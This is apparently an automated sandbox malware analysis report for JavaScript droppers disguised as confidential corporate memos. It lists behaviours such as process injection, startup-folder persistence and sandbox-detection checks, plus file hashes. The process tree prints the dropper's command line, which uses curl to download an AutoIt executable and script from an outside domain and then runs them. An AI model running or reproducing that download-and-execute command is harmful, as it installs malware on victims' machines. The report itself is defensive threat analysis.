Overview
overview
10Static
static
1Embarking_...ial.js
windows7-x64
3Embarking_...ial.js
windows10-2004-x64
10Navigating...ial.js
windows7-x64
3Navigating...ial.js
windows10-2004-x64
10Redefining...ial.js
windows7-x64
3Redefining...ial.js
windows10-2004-x64
10Role_Direc...ial.js
windows7-x64
3Role_Direc...ial.js
windows10-2004-x64
10Transition...ial.js
windows7-x64
3Transition...ial.js
windows10-2004-x64
10Analysis
-
max time kernel
151s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
18-10-2023 07:18
Static task
static1
Behavioral task
behavioral1
Sample
Embarking_on_Our_Renewed_Mission_and_Values_2023_Confidential.js
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
Embarking_on_Our_Renewed_Mission_and_Values_2023_Confidential.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral3
Sample
Navigating_Our_Evolution_October_2023_Confidential.js
Resource
win7-20230831-en
Behavioral task
behavioral4
Sample
Navigating_Our_Evolution_October_2023_Confidential.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral5
Sample
Redefining_Our_Structural_Canvas_2023_Confidential.js
Resource
win7-20230831-en
Behavioral task
behavioral6
Sample
Redefining_Our_Structural_Canvas_2023_Confidential.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral7
Sample
Role_Directives_Effective_2023_Confidential.js
Resource
win7-20230831-en
Behavioral task
behavioral8
Sample
Role_Directives_Effective_2023_Confidential.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral9
Sample
Transition_Journey_2023_Confidential.js
Resource
win7-20230831-en
Behavioral task
behavioral10
Sample
Transition_Journey_2023_Confidential.js
Resource
win10v2004-20230915-en
General
-
Target
Embarking_on_Our_Renewed_Mission_and_Values_2023_Confidential.js
-
Size
49KB
-
MD5
c19568c51692a5b4dbfc29c02fafcf8d
-
SHA1
b265c4f15c591a241d19c7284efeeb1e73407df0
-
SHA256
c8c425368b40c30a09a8e4990e53a1df4c29493ad138287493da0d6f56f1dade
-
SHA512
329efccd2808ffd1ee7c6e741890aad2ee22705bd0c2703a11f054e6d29520964c39edfb039cf3834c0e23990994b95748edb74944fdfad1d8c78e5adc9b4dbc
-
SSDEEP
768:pBA7PMMFA0tdlXKNSR4vlGRep2lcwJeL+C2jQdc7YCORUQuFBt3Dxt7niEL:nAIMFFdYMxAcEQDFXL
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 64 IoCs
description pid Process procid_target PID 1980 created 3888 1980 Autoit3.exe 35 PID 1980 created 3408 1980 Autoit3.exe 84 PID 1980 created 3788 1980 Autoit3.exe 24 PID 1980 created 3788 1980 Autoit3.exe 24 PID 1980 created 5016 1980 Autoit3.exe 83 PID 1980 created 2464 1980 Autoit3.exe 48 PID 1980 created 3796 1980 Autoit3.exe 82 PID 1980 created 3788 1980 Autoit3.exe 24 PID 1980 created 2660 1980 Autoit3.exe 41 PID 1980 created 3788 1980 Autoit3.exe 24 PID 1980 created 3572 1980 Autoit3.exe 37 PID 1980 created 3572 1980 Autoit3.exe 37 PID 4968 created 3732 4968 cmd.exe 36 PID 4968 created 3800 4968 cmd.exe 12 PID 4968 created 2660 4968 cmd.exe 41 PID 4968 created 3788 4968 cmd.exe 24 PID 4968 created 3888 4968 cmd.exe 35 PID 4968 created 2464 4968 cmd.exe 48 PID 4968 created 3788 4968 cmd.exe 24 PID 4968 created 3800 4968 cmd.exe 12 PID 4968 created 2480 4968 cmd.exe 47 PID 4968 created 3788 4968 cmd.exe 24 PID 4968 created 3788 4968 cmd.exe 24 PID 4968 created 3732 4968 cmd.exe 36 PID 4968 created 3888 4968 cmd.exe 35 PID 4968 created 3800 4968 cmd.exe 12 PID 4968 created 2464 4968 cmd.exe 48 PID 4968 created 2464 4968 cmd.exe 48 PID 4968 created 3888 4968 cmd.exe 35 PID 4968 created 3888 4968 cmd.exe 35 PID 4968 created 2464 4968 cmd.exe 48 PID 4968 created 3732 4968 cmd.exe 36 PID 4968 created 3572 4968 cmd.exe 37 PID 4968 created 2464 4968 cmd.exe 48 PID 4968 created 2480 4968 cmd.exe 47 PID 4968 created 3888 4968 cmd.exe 35 PID 4968 created 3888 4968 cmd.exe 35 PID 4968 created 2464 4968 cmd.exe 48 PID 4968 created 3888 4968 cmd.exe 35 PID 4968 created 3572 4968 cmd.exe 37 PID 4968 created 2480 4968 cmd.exe 47 PID 4968 created 3732 4968 cmd.exe 36 PID 4968 created 2464 4968 cmd.exe 48 PID 4968 created 2660 4968 cmd.exe 41 PID 4968 created 2480 4968 cmd.exe 47 PID 4968 created 3800 4968 cmd.exe 12 PID 4968 created 3572 4968 cmd.exe 37 PID 4968 created 3732 4968 cmd.exe 36 PID 4968 created 2464 4968 cmd.exe 48 PID 4968 created 3732 4968 cmd.exe 36 PID 4968 created 2480 4968 cmd.exe 47 PID 4968 created 3788 4968 cmd.exe 24 PID 4968 created 2480 4968 cmd.exe 47 PID 4968 created 3732 4968 cmd.exe 36 PID 4968 created 3800 4968 cmd.exe 12 PID 4968 created 3788 4968 cmd.exe 24 PID 4968 created 2464 4968 cmd.exe 48 PID 4968 created 3800 4968 cmd.exe 12 PID 4968 created 2660 4968 cmd.exe 41 PID 4968 created 3888 4968 cmd.exe 35 PID 4968 created 3572 4968 cmd.exe 37 PID 4968 created 2480 4968 cmd.exe 47 PID 4968 created 3572 4968 cmd.exe 37 PID 4968 created 3732 4968 cmd.exe 36 -
Blocklisted process makes network request 64 IoCs
flow pid Process 22 4968 cmd.exe 23 4968 cmd.exe 24 4968 cmd.exe 26 4968 cmd.exe 32 4968 cmd.exe 34 4968 cmd.exe 35 4968 cmd.exe 38 4968 cmd.exe 43 4968 cmd.exe 44 4968 cmd.exe 45 4968 cmd.exe 54 4968 cmd.exe 55 4968 cmd.exe 56 4968 cmd.exe 57 4968 cmd.exe 58 4968 cmd.exe 59 4968 cmd.exe 63 4968 cmd.exe 64 4968 cmd.exe 65 4968 cmd.exe 66 4968 cmd.exe 67 4968 cmd.exe 68 4968 cmd.exe 69 4968 cmd.exe 70 4968 cmd.exe 71 4968 cmd.exe 72 4968 cmd.exe 73 4968 cmd.exe 74 4968 cmd.exe 75 4968 cmd.exe 76 4968 cmd.exe 77 4968 cmd.exe 78 4968 cmd.exe 79 4968 cmd.exe 80 4968 cmd.exe 81 4968 cmd.exe 82 4968 cmd.exe 83 4968 cmd.exe 84 4968 cmd.exe 85 4968 cmd.exe 86 4968 cmd.exe 87 4968 cmd.exe 88 4968 cmd.exe 89 4968 cmd.exe 90 4968 cmd.exe 91 4968 cmd.exe 92 4968 cmd.exe 93 4968 cmd.exe 94 4968 cmd.exe 95 4968 cmd.exe 96 4968 cmd.exe 97 4968 cmd.exe 98 4968 cmd.exe 99 4968 cmd.exe 100 4968 cmd.exe 101 4968 cmd.exe 102 4968 cmd.exe 103 4968 cmd.exe 104 4968 cmd.exe 109 4968 cmd.exe 110 4968 cmd.exe 111 4968 cmd.exe 113 4968 cmd.exe 114 4968 cmd.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation wscript.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aefbcdb.lnk cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 1980 Autoit3.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1980 set thread context of 4968 1980 Autoit3.exe 93 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Autoit3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Autoit3.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString cmd.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1980 Autoit3.exe 1980 Autoit3.exe 1980 Autoit3.exe 1980 Autoit3.exe 1980 Autoit3.exe 1980 Autoit3.exe 1980 Autoit3.exe 1980 Autoit3.exe 1980 Autoit3.exe 1980 Autoit3.exe 1980 Autoit3.exe 1980 Autoit3.exe 1980 Autoit3.exe 1980 Autoit3.exe 1980 Autoit3.exe 1980 Autoit3.exe 1980 Autoit3.exe 1980 Autoit3.exe 1980 Autoit3.exe 1980 Autoit3.exe 1980 Autoit3.exe 1980 Autoit3.exe 1980 Autoit3.exe 1980 Autoit3.exe 1980 Autoit3.exe 1980 Autoit3.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe 4968 cmd.exe -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 3796 wrote to memory of 5016 3796 wscript.exe 83 PID 3796 wrote to memory of 5016 3796 wscript.exe 83 PID 5016 wrote to memory of 5032 5016 cmd.exe 85 PID 5016 wrote to memory of 5032 5016 cmd.exe 85 PID 5016 wrote to memory of 3184 5016 cmd.exe 86 PID 5016 wrote to memory of 3184 5016 cmd.exe 86 PID 5016 wrote to memory of 1980 5016 cmd.exe 87 PID 5016 wrote to memory of 1980 5016 cmd.exe 87 PID 5016 wrote to memory of 1980 5016 cmd.exe 87 PID 1980 wrote to memory of 620 1980 Autoit3.exe 92 PID 1980 wrote to memory of 620 1980 Autoit3.exe 92 PID 1980 wrote to memory of 620 1980 Autoit3.exe 92 PID 1980 wrote to memory of 4968 1980 Autoit3.exe 93 PID 1980 wrote to memory of 4968 1980 Autoit3.exe 93 PID 1980 wrote to memory of 4968 1980 Autoit3.exe 93 PID 1980 wrote to memory of 4968 1980 Autoit3.exe 93 PID 1980 wrote to memory of 4968 1980 Autoit3.exe 93
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3800
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca1⤵PID:3788
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:3888
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3732
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3572
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵PID:2660
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2480
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2464
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Embarking_on_Our_Renewed_Mission_and_Values_2023_Confidential.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3796 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local\Temp & curl -o Autoit3.exe http://hgfdytrywq.com:80 & curl -o sejtnt.au3 http://hgfdytrywq.com:80/msizjphqffb & Autoit3.exe sejtnt.au32⤵
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3408
-
-
C:\Windows\system32\curl.execurl -o Autoit3.exe http://hgfdytrywq.com:803⤵PID:5032
-
-
C:\Windows\system32\curl.execurl -o sejtnt.au3 http://hgfdytrywq.com:80/msizjphqffb3⤵PID:3184
-
-
C:\Users\Admin\AppData\Local\Temp\Autoit3.exeAutoit3.exe sejtnt.au33⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.14⤵PID:620
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.14⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Blocklisted process makes network request
- Drops startup file
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4968
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
166B
MD58be387116407b4ac1197f164d038f706
SHA122af1a1e9d691321316c9ea21961425642863b73
SHA2566a0a730f81cd577e21064c36d67bfe1d8bd1ddf54bca4b82e4bd10385a0d9a3e
SHA512ee7101912d13c3ae5987065c966cf1293088d21752f837495f522a005ce6c343dd74aefb449a128b8c0def26762b36f611242b704d973d8a94977daf59da9c33
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
487KB
MD54c5474759bd10c4fd072e73ae027b733
SHA16b8c6dcd7f1e7043a734e8b5c6168ffb8c1d599e
SHA256be1018a311679d697282aa5165018548e84bc31407cffe6764992f4ee0a73a46
SHA512b88205551eff94b46b322219ae10ec62cedcc14302f1462546c0b32f34341d18a8c7a985918e4b4a4daf0e8c986e8fc7f23df842d84b42622871aee75c24609d
-
Filesize
487KB
MD54c5474759bd10c4fd072e73ae027b733
SHA16b8c6dcd7f1e7043a734e8b5c6168ffb8c1d599e
SHA256be1018a311679d697282aa5165018548e84bc31407cffe6764992f4ee0a73a46
SHA512b88205551eff94b46b322219ae10ec62cedcc14302f1462546c0b32f34341d18a8c7a985918e4b4a4daf0e8c986e8fc7f23df842d84b42622871aee75c24609d